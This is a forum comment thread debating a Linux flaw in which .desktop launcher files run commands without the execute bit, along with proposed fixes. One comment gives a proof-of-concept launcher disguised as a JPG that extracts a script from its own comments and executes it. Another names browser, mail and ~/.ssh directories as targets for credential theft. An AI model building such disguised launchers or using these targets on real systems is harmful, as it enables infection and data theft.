Never double-click items on the Desktop. Always right-mouse click desktop items or nautilus file items and choose the "Open with..." menu item.

Why not +x?

[zokier]

Could someone please explain why the +x solution was rejected? Obviously shebang will also be needed, but I don't see the problem with that.

Backward compablity could be achieved with a warning dialog: 'You are trying to open non-executable .desktop-file. What do you want to do? [Add +x] [Run] [Edit]' (ok, maybe with better wording but anyways)

The best reason I got from TFA(!) was that if KDE would be installed on FAT32-system which doesn't support execute-flag for files, then the system would fail.

Payload within .desktop

[FxChiP]

Has anyone mentioned the possibility yet of embedding the payload (malicious script, etc.) within the .desktop file? The specification allows for commenting, after all, which is a free way to embed text -- the question then merely becomes one of extracting the text from the "comments" at the tail end of a .desktop file, outputting it to its own file, and executing.

To wit, in a file called blah.desktop:

[OMGMALICIOUS]
Version=1.0
Type=Application
Name=HOT XXX JENNA JAMESON.jpg
Icon=jpegicon.png
Exec=bash -c "tail -n +7 blah.desktop | sed -E 's/^#(.*)$/\1/g' > malscript; chmod 777 malscript; ./malscript"
##!/bin/bash
##
## OMG MALICIOUS
#
#echo OMG HI PWNED J00 > pwned

Which would then open the door to other types of scripts being embedded within the .desktop file, such as Python or Perl (the latter of which is probably the even more widespread of the two!)

This method has a few benefits over the described one, including: offline execution of malware, no further download beyond the .desktop required; semi-easy modification of the embedded script (you can add or remove lines as you wish and even leave comments in thanks to the tail and sed commands used); and the embedded file could easily make the .desktop file it's contained in reach file size levels (something I, personally, look at with certain files) roughly equivalent to the file it's attempting to masquerade as. Theoretically, so long as you remembered to escape things properly, you could possibly even include binaries within the .desktop file in this manner(!!!!).

This of course comes no closer to the holy grail that is root, but still an interesting twist on the same process...

Microsoft, Linux, Apple. All the same.

[FyberOptic]

It's things like this that really bug me about the open-source zealot mentality of "Oh yeah? What about Windows?" Well who cares about Windows? Windows isn't your problem at the moment.

Linux has had quite a lot of security flaws over the years, especially important ones like privilege escalation in the kernel, which makes people defending its architecture compared to Windows a moot point. It's been a server OS for a long time, making it a valuable target in that respect much like Windows is on the web front.

The point is, as is commonly acknowledged, if Linux had a user base large enough to warrant it, it would have just as many problems with web vulnerabilities as Windows. Especially when people still use software like Firefox, which is also known to have had many buffer overflow problems over its lifespan. So boasting about Linux being the safest OS is just hogwash. Only an incredibly naive and/or ignorant person would say that Linux is outright safe.

It presently boils down to the mindset of the Linux user base, and its size. That is all. A smart Windows user will very rarely, if ever, get infected with anything. I can vouch for that personally.

A stupid user of any popular OS is going to have problems as long as there is bad coding done by developers. And every OS has shown evidence of that. Microsoft isn't any better or worse in that respect. You can look at changelogs for lots of open-source software for plenty of proof in that department. And don't give me the "Windows takes XXXX amount of time to fix it blah blah they suck most", because there's been open-source projects with problems for just as long.

Still no root - until the distros become morons

[Master+of+Transhuman]

And they are.

The guy's article says you can get root by accessing the launchers for things like synaptics which require root access.

But this only works if you do stupid shit like Ubuntu - and now apparently openSUSE - where you allow people to run stuff with sudo or gksu.

If you do what I do and disable that shit, and only use su with the root password, so much for that plan.

Which is why I've bitched about Ubuntu and other distros "dumbing down" the difference between regular and root users. When Ubuntu started this shit, they claimed it was more secure.

Well, now we see it isn't.

The article is interesting as detailing a means of writing malware that can infect a normal user, but this has been known to be possible for years on Linux. And while certain idiots on USENET (Peter Breuer with whom I had a huge argument some years ago about precisely whether viruses were possible on UNIX - especially since Dr. Fred Cohen's original virus work was ALL on UNIX!) have said Linux is invulnerable, the reality has been known to be otherwise. There are proof of concept viruses for Linux in existence. All you really need is one of these user space malware programs that can implement an unpatched privilege escalation exploit. Note the key word - unpatched.

But for the most part, Linux is not terribly vulnerable to root privilege elevation as long as the proper patches are applied regularly. The same is true of Windows. More importantly, Linux simply has a cleaner separation of kernel space and user space, reducing the vulnerability footprint somewhat.

But the real problem for ALL software is the utter lack of attention paid in the industry to DESIGNING software with the components of reliability, security and maintenance first and foremost. The industry is just in a PATHETIC shape. ALL the effort in writing software is devoted to getting it to do its core function - the equally important functions listed are ignored or tacked on as an afterthought.

How many patches for buffer overflows are still released today even though that vulnerability has been known for the last two decades?

Software quality is a joke. A bad joke.

Re:Stay away from root

[zrq]

Loss of personal data (as in deletion) isn't the problem. Access to personal data (including identity) is the problem.

As someone else has already pointed out, first thing to look for would be the ~/.mozilla or ~/.thunderbird directories. Which gives the malware all kinds of useful data, including address book, and saved passwords for websites.

If the malware was more technical and wanted to gain access to a server rather than just a desktop machine, then ~/.ssh would be a good place to start.

just detect them in the mail clients!

[kamathln]

If the mail client is downloading a *.desktop file, warn the user. Yeah, the social Engineering virus propogators will find a way around it, say give the file in a wrong name and ask the user to rename it after download. There are medicines for that too.

The distributions installing the *.desktop files should create a unique signature and sign each of the *.desktop files it installs. Anything downloaded from the Internet will obviously not have those, even if you rename them. So the desktop environment should prompt the user if it finds a *.desktop file without the signature. And if the *.desktop was in the auto-start folder, heh! forget it getting executed.

And then there are people so naive they will even fall for "Follow these steps to copy the signature file and then double click on the file" social engineering trick. The enemy of humanity is humanity itself, and suddenly I feel the decision of Skynet was not so wrong after all! Oh God, Save the world from me!
   

Re:Protect your self with encryption

[nicodoggie]

Heh, yeah, that would get pretty old real fast. Like a barrage of Vista UAC prompts... maybe we should just let them troll bug trackers so the community can discourage them from doing anything stupid.

Someone explain this to me?

[pugugly]

I'm no great shakes as a programmer, but as soon as the article mentioned tha .desktop files didn't respect the 'x' switch, *I* knew exactly where this was going to go and that he was 100% right in going there.

Which begs the question - how the hell did this get approved as a good idea?

It violates the entire program/data paradigm, in an obvious way.

It ignores I don't know how many years of security theory and practice.

And you couldn't come up with a flaw more likely to make Bill Gates laugh his ass off going "Oh, yeah, we made that mistake once . . . . years and years ago . . ." without a committee.

So, is there some reason this seemed perfectly reasonable that I missed?

Pug, who should always be the dumbest person in any given room dammit!

Re:Someone explain this to me?

[Weedlekin]

"So, is there some reason this seemed perfectly reasonable that I missed?"

Because there are so many totally legitimate reasons for having the facility to execute something that looks like a data file to users, and actually is a data file as far as *NIX and everything else that runs on it is concerned. For example:

1) ... err .. I'm having a bit of trouble coming up with some reasons here. Somebody please help me (sob).

Think before doing something.

[Noxn]

Well, i never thought or said Linux was invulnerable... Also many people told me that the Linux viruses can be waaay nastier then windows ones.

But, in many years of using Windows XP i almost never got a virus(/malware/trojan).
Why? Because I'm not the type of people that say:
"WHAT? Free music??? *clickyclickyvirusdownload*" (Yes, a friend of mine did this.)
Why should I be less careful in linux?

PS: I still think Linux is more secure than windows. (Not only because system security, but also because Linux users know more about computer then windows users (most of times))

Blame Game

[tiggertaebo]

So despite this being a long standing (and seemingly well reported issue) neither vendor has managed a fix or even seems interested in doing one. However since this is FOSS the much vaunted "community" has managed to make a fix widely available and has submitted to the distros etc right? Er.. no. Instead people are happily sat here blaming the users (for actually daring to attempt to make use of the usability features the developers have provided) and Microsoft (who are like evil predators with their sweet candy [or usuability features as the case may be] leading the innocent linux desktop developers astray from the pious path of hard to use software that no one likes). Sounds like for all the bluster and noise when open source software has a vulnerability its the same old story as with closed. Pretty pathetic eh?

finally...

[dmkaplan]

Finally someone has brought this problem to the forefront. I have been assuming for years that thinking about this problem was just my paranoia. And I don't understand why they don't just fix it. In my mind, the solution is simple: 1) Add a line "#!/usr/bin/desktop-icon-parser-program" to the beginning of every .desktop file 2) Require the execution bit. This would also solve the problem that .desktop files cannot be executed from the terminal, making them useless for those that mainly use the terminal, but occasionally use the desktop (old school style). If the two changes above are made, then you simply execute ~/Desktop/mylauncher.desktop to run the launcher.

Why is this ignorence Slashdot?

[s.petry]

The person who write the article really has no clue what a virus or malware is.

If this genius called a user tricked them into giving personal information would they title the article "How to make a phone dump personal info"?

Hint: Tricking users into doing dumb things is not a vulnerability in an OS.

People who know and understand the Shell realize that there are potential problems, even before you get to a GUI. Ever here of the $HOME/.profile?

I discovered this too!

[arnodf]

when I first started using linux several years ago I didn't know how to execute commands, just clicking a downloaded executable file didn't work so after a while I discovered I could run them using a launcher. I thought that was the way executable were run on linux... silly me, until I learned about the execution bit. I was a former winblows-user, hence the stupidity.

Re:Stay away from root

[berend+botje]

Your data should be backed up. If you lose data, it is your own damn fault.

And I'm not sure which decade you're from, but between chroot and jails we already have proper sandboxing.

Really, try to keep up, will ya?